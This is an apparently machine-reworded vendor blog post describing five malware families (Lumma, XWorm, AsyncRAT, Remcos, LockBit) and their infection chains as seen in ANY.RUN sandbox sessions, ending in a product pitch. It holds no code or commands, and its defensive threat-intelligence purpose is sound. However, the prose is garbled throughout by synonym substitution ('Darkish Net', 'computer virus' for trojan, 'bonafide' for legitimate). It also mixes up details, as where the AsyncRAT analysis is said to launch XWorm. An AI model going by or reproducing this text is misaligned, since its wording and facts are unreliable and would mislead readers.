2024 had its justifiable share of high-profile cyber assaults, with firms as huge as Dell and TicketMaster falling sufferer to information breaches and different infrastructure compromises. In 2025, this pattern will proceed. So, to be ready for any form of malware assault, each group must know its cyber enemy prematurely. Listed here are 5 widespread malware households which you could begin making ready to counter proper now.
Lumma
Lumma is a broadly obtainable malware designed to steal delicate data. It has been brazenly offered on the Darkish Net since 2022. This malware can successfully accumulate and exfiltrate information from focused functions, together with login credentials, monetary data, and private particulars.
Lumma is frequently up to date to boost its capabilities. It will possibly log detailed data from compromised techniques, reminiscent of looking historical past and cryptocurrency pockets information. It may be used to put in different malicious software program on contaminated units. In 2024, Lumma was distributed by way of varied strategies, together with pretend CAPTCHA pages, torrents, and focused phishing emails.
Evaluation of a Lumma Assault
Proactive evaluation of suspicious information and URLs inside a sandbox surroundings can successfully aid you forestall Lumma an infection.
Let’s have a look at how you are able to do it utilizing ANY.RUN’s cloud-based sandbox. It not solely delivers definitive verdicts on malware and phishing together with actionable indicators but in addition permits real-time interplay with the risk and the system.
Check out this evaluation of a Lumma assault.
 |
| ANY.RUN allows you to manually open information and launch executables |
It begins with an archive which comprises an executable. As soon as we launch the .exe file, the sandbox mechanically logs all processes and community actions, displaying Lumma’s actions.
 |
| Suricata IDS informs us a few malicious connection to Lumma’s C2 server |
It connects to its command-and-control (C2) server.
 |
| Malicious course of answerable for stealing information from the system |
Subsequent, it begins to gather and exfiltrate information from the machine.
 |
| You need to use the IOCs extracted by the sandbox to boost your detection techniques |
After ending the evaluation, we are able to export a report on this pattern, that includes all of the vital indicators of compromise (IOCs) and TTPs that can be utilized to complement defenses in opposition to potential Lumma assaults in your group.
Strive all options of ANY.RUN’s Interactive Sandbox at no cost with a 14-day trial
XWorm
XWorm is a computer virus that provides cybercriminals distant management over contaminated computer systems. First showing in July 2022, it could possibly accumulate a variety of delicate data, together with monetary particulars, looking historical past, saved passwords, and cryptocurrency pockets information.
XWorm permits attackers to watch victims’ actions by monitoring keystrokes, capturing webcam photographs, listening to audio enter, scanning community connections, and viewing open home windows. It will possibly additionally entry and manipulate the pc’s clipboard, probably stealing cryptocurrency pockets credentials.
In 2024, XWorm was concerned in lots of large-scale assaults, together with ones that exploited CloudFlare tunnels and bonafide digital certificates.
Evaluation of a XWorm Assault
 |
| Phishing emails are sometimes the preliminary stage of XWorm assaults |
On this assault, we are able to see the unique phishing electronic mail, which includes a hyperlink to a Google drive.
 |
| A Google Drive web page with a obtain hyperlink to a malicious archive |
As soon as we observe the hyperlink, we’re provided to obtain an archive which is protected with a password.
 |
| Opened malicious archive with a .vbs file |
The password may be discovered within the electronic mail. After getting into it, we are able to entry a .vbs script contained in the .zip file.
 |
| XWorm makes use of MSBuild.exe to persist on the system |
As quickly as we launch the script, the sandbox immediately detects malicious actions, which finally result in the deployment of XWorm on the machine.
AsyncRAT
AsyncRAT is one other distant entry trojan on the listing. First seen in 2019, it was initially unfold by way of spam emails, usually exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained recognition and been utilized in varied cyber assaults.
AsyncRAT has advanced over time to incorporate a variety of malicious capabilities. It will possibly secretly file a sufferer’s display screen exercise, log keystrokes, set up extra malware, steal information, keep a persistent presence on contaminated techniques, disable safety software program, and launch assaults that overwhelm focused web sites.
In 2024, AsyncRAT remained a big risk, usually disguised as pirated software program. It was additionally one of many first malware households to be distributed as a part of complicated assaults involving scripts generated by AI.
Evaluation of an AsyncRAT Assault
 |
| The preliminary archive with an .exe file |
On this evaluation session, we are able to see one other archive with a malicious executable inside.
 |
| A PowerShell course of used for downloading a payload |
Detonating the file kicks off the execution chain of XWorm, which entails the usage of PowerShell scripts to fetch extra information wanted to facilitate the an infection.
As soon as the evaluation is completed, the sandbox shows the ultimate verdict on the pattern.
Remcos
Remcos is a malware that has been marketed by its creators as a legit distant entry instrument. Since its launch in 2019, it has been utilized in quite a few assaults to carry out a variety of malicious actions, together with stealing delicate data, remotely controlling the system, recording keystrokes, capturing display screen exercise, and so on.
In 2024, campaigns to distribute Remcos used methods like script-based assaults, which frequently begin with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 by leveraging malicious XML information.
Evaluation of a Remcos Assault
 |
| Phishing electronic mail opened in ANY.RUN’s Interactive Sandbox |
On this instance, we’re met with one other phishing electronic mail that includes a .zip attachment and a password for it.
 |
| cmd course of used in the course of the an infection chain |
The ultimate payload leverages Command Immediate and Home windows system processes to load and execute Remcos.
 |
| MITRE ATT&CK matrix offers a complete view of the malware’s methods |
The ANY.RUN sandbox maps the whole chain of assault to the MITRE ATT&CK matrix for comfort.
LockBit
LockBit is a ransomware primarily focusing on Home windows units. It’s thought of one of many largest ransomware threats, accounting for a considerable portion of all Ransomware-as-a-Service (RaaS) assaults. The decentralized nature of the LockBit group has allowed it to compromise quite a few high-profile organizations worldwide, together with the UK’s Royal Mail and India’s Nationwide Aerospace Laboratories (in 2024).
Regulation enforcement businesses have taken steps to fight the LockBit group, resulting in the arrest of a number of builders and companions. Regardless of these efforts, the group continues to function, with plans to launch a brand new model, LockBit 4.0, in 2025.
Evaluation of a LockBit Assault
 |
| LockBit ransomware launched within the secure surroundings of the ANY.RUN sandbox |
Take a look at this sandbox session, displaying how briskly LockBit infects and encrypts information on a system.
 |
| ANY.RUN’s Interactive Sandbox allows you to see static evaluation of each modified file on the system |
By monitoring file system modifications, we are able to see it modified 300 information in lower than a minute.
 |
| Ransom word tells victims to contact attackers |
The malware additionally drops a ransom word, detailing the directions for getting the info again.
Enhance Your Proactive Safety with ANY.RUN’s Interactive Sandbox
Analyzing cyber threats proactively as a substitute of reacting to them as soon as they turn out to be an issue to your group is the perfect plan of action any enterprise can take. Simplify it with ANY.RUN’s Interactive sandbox by inspecting all suspicious information and URLs inside a secure digital surroundings that helps you determine malicious content material with ease.
With the ANY.RUN sandbox, your organization can:
- Swiftly detect and ensure dangerous information and hyperlinks throughout scheduled checks.
- Examine how malware operates on a deeper degree to disclose its techniques and techniques.
- Reply to safety incidents extra successfully by amassing vital risk insights by way of sandbox evaluation.
Strive all options of ANY.RUN with a 14-day free trial.
